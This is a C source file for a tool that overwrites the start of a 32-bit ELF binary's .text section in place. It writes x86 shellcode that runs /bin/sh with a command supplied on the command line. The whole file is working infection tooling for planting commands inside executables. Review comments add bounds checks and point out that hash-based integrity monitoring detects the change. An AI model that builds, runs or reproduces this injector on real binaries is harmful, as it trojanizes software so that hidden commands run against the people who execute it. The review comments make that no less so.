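/* .text overwritting by nex */
/*
 * Reads a 32-bit little-endian ELF file, locates its ".text" section through
 * the section header table and overwrites the start of that section, in
 * place, with `payload` followed by the string given as argv[2].
 *
 * NOTE(review): the header names of the original #include lines were lost
 * when this listing was extracted; the headers below are the ones the code
 * visibly needs.
 *
 * The write goes through pwrite() at an offset inside the existing file, so
 * the file's length normally stays the same while its contents (and hence
 * its hash) change. Integrity monitoring that compares hashes rather than
 * sizes or names is what notices this kind of modification.
 */
#include <elf.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Raw machine code copied verbatim into the target. The embedded byte
 * strings spell "//bin/sh" and "-ccc"; the argv[2] string is appended
 * directly after the last byte (see main).
 * NOTE(review): presumably 32-bit Linux/x86, matching the ELFCLASS32 check.
 */
char payload[] =
    "\x60\x31\xc0\x31\xd2\xb0"
    "\x0b\x52\x68\x6e\x2f\x73"
    "\x68\x68\x2f\x2f\x62\x69"
    "\x89\xe3\x52\x68\x2d\x63"
    "\x63\x63\x89\xe1\x52\xeb"
    "\x07\x51\x53\x89\xe1\xcd"
    "\x80\x61\xe8\xf4\xff\xff\xff";

int print_section_header(Elf32_Shdr *shdr, char *strtable);
char* get_elf_type(Elf32_Ehdr *elf);
void banner(void);
int elf_is_valid(Elf32_Ehdr *elf_hdr);
void die(int line,char *err,int code);

/*
 * Entry point: argv[1] is the ELF file to modify, argv[2] the string that is
 * appended to `payload`. Returns 0 on success; every failure goes through
 * die(), which exits with -1.
 */
int main(int argc, char *argv[])
{
    int fd = -1;
    char *buf = NULL;
    char *table = NULL;
    char *shellcode = NULL;
    struct stat elf_stat;
    Elf32_Ehdr *elf_header = NULL;
    Elf32_Shdr *section_hdr = NULL;
    Elf32_Shdr *strtab_hdr = NULL;
    int i, size, sh_size;
    size_t fsize;

    if (argc < 3)
        die(__LINE__, "Usage: ./inject ", -1);

    banner();
    printf( "@ File name \t: %s .\n", argv[1] );

    if ((fd = open(argv[1], O_RDWR)) < 0)       /* Open file in read/write mode */
        die(__LINE__, "error opening file", -1);

    if (fstat(fd, &elf_stat) < 0)               /* Getting size with fstat */
        die(__LINE__, "error getting file size", -1);

    /* `size` is an int (it is printed with %d and passed to read()), so
     * refuse files whose length does not fit instead of truncating it. */
    if (elf_stat.st_size < 0 || elf_stat.st_size >= INT_MAX)
        die(__LINE__, "file too large", -1);
    size = (int)elf_stat.st_size;
    fsize = (size_t)size;
    printf( "@ File size \t: %d bytes .\n", size );

    buf = malloc(fsize + 1);
    if (!buf)
        die(__LINE__, "out of memory", -1);

    /* payload (including its NUL) plus the argv[2] bytes; the copy below
     * starts on the payload's NUL so the zero-filled tail terminates it. */
    sh_size = sizeof(payload) + strlen(argv[2]);
    shellcode = malloc(sh_size);
    if (!shellcode)
        die(__LINE__, "out of memory", -1);
    memset(shellcode, 0x0, sh_size);
    memcpy(shellcode, payload, sizeof(payload));
    memcpy(shellcode + sizeof(payload) - 1, argv[2], strlen(argv[2]));

    if (read(fd, buf, size) != size)            /* Read whole file */
        die(__LINE__, "error reading bytes", -1);

    /* The header is read straight out of the file buffer, so the file must
     * be at least as large as the header before any field is touched. */
    if (fsize < sizeof(Elf32_Ehdr))
        die(__LINE__, "bad elf file", -1);
    elf_header = (Elf32_Ehdr *)buf;

    /* elf_is_valid() returns 1/0; the original compared against -1, so an
     * invalid file was never rejected here. */
    if (!elf_is_valid(elf_header))
        die(__LINE__, "bad elf file", -1);

    printf("@ Entry point \t: 0x%X .\n", elf_header->e_entry );
    printf("@ Type \t: %s .\n", get_elf_type(elf_header));
    printf("\n");

    /* Every offset and count below comes from the file itself: check that
     * the section header table and the name table lie inside the buffer
     * before indexing into them. */
    if (elf_header->e_shoff > fsize ||
        (size_t)elf_header->e_shnum * sizeof(Elf32_Shdr) > fsize - elf_header->e_shoff ||
        elf_header->e_shstrndx >= elf_header->e_shnum)
        die(__LINE__, "bad section header table", -1);

    section_hdr = (Elf32_Shdr *)(buf + elf_header->e_shoff);    /* Get first section */

    strtab_hdr = &section_hdr[elf_header->e_shstrndx];
    if (strtab_hdr->sh_size == 0 ||
        strtab_hdr->sh_offset > fsize ||
        strtab_hdr->sh_size > fsize - strtab_hdr->sh_offset ||
        buf[strtab_hdr->sh_offset + strtab_hdr->sh_size - 1] != '\0')
        die(__LINE__, "bad section name table", -1);

    table = buf + strtab_hdr->sh_offset;        /* Table of section name */

    for (i = 0; i < elf_header->e_shnum; i++) {
        /* A name offset outside the string table would make the strcmp()
         * in print_section_header() read past the buffer. */
        if (section_hdr[i].sh_name >= strtab_hdr->sh_size)
            continue;

        if (print_section_header(&section_hdr[i], table)) {
            /* Write the shellcode at the first byte of .text section */
            if (pwrite(fd, shellcode, sh_size, section_hdr[i].sh_offset) != sh_size)
                die(__LINE__, "error writing bytes", -1);
        }
    }

    close(fd);
    free(shellcode);
    free(buf);
    return 0;
}

/* Print the failing source line and message, then exit with `code`. */
void die(int line,char *err,int code)
{
    printf("[-]Line %d: %s.\n", line, err);
    exit(code);
}

/*
 * Return 1 when the identification bytes describe a 32-bit, little-endian
 * ELF file (magic, EI_CLASS, EI_DATA), 0 otherwise.
 */
int elf_is_valid(Elf32_Ehdr *elf_hdr)
{
    if ((elf_hdr->e_ident[EI_MAG0] != 0x7F) ||
        (elf_hdr->e_ident[EI_MAG1] != 'E')  ||
        (elf_hdr->e_ident[EI_MAG2] != 'L')  ||
        (elf_hdr->e_ident[EI_MAG3] != 'F'))
        return 0;

    if (elf_hdr->e_ident[EI_CLASS] != ELFCLASS32)
        return 0;

    if (elf_hdr->e_ident[EI_DATA] != ELFDATA2LSB)
        return 0;

    return 1;
}

/* Print the program banner. */
void banner(void)
{
    printf("\t~~~ .text section overwritting ~~~\n\n");
}

/*
 * Map e_type to a printable name. Returns NULL when the header fails
 * elf_is_valid(), and "Unknown" when e_type is outside the table; the
 * original indexed the six-entry table with the raw 16-bit field.
 */
char* get_elf_type(Elf32_Ehdr *elf)
{
    static const char *const types[] = {
        "None",
        "Relocatable",
        "Executable",
        "Shared Object",
        "Core",
        "Defined Types"
    };

    if (!elf_is_valid(elf))
        return NULL;

    if (elf->e_type >= sizeof types / sizeof types[0])
        return (char *)"Unknown";

    return (char *)types[elf->e_type];
}

/*
 * Print the fields of `shdr` and return 1 when the section is named ".text"
 * (or its sh_name equals 127); return 0 otherwise or when shdr is NULL.
 * The caller must make sure strtable + shdr->sh_name points at a
 * NUL-terminated string inside the name table.
 * NOTE(review): the reason for the sh_name == 127 special case is not
 * visible in this file - confirm before relying on it.
 */
int print_section_header(Elf32_Shdr *shdr, char *strtable)
{
    if (!shdr)
        return 0;

    if (shdr->sh_name == 127 || (!strcmp(strtable + shdr->sh_name, ".text"))) {
        printf("+ Section %s\n", strtable + shdr->sh_name);
        printf("\t@ Virtual Address: 0x%x\n", shdr->sh_addr);
        printf("\t@ Offset: 0x%x\n", shdr->sh_offset);
        printf("\t@ Size: %d\n", shdr->sh_size);
        printf("\t@ Address alignment: %d\n", shdr->sh_addralign);
        printf("\t@ Entry size: 0x%x\n", shdr->sh_entsize);
        return 1;
    }

    return 0;
}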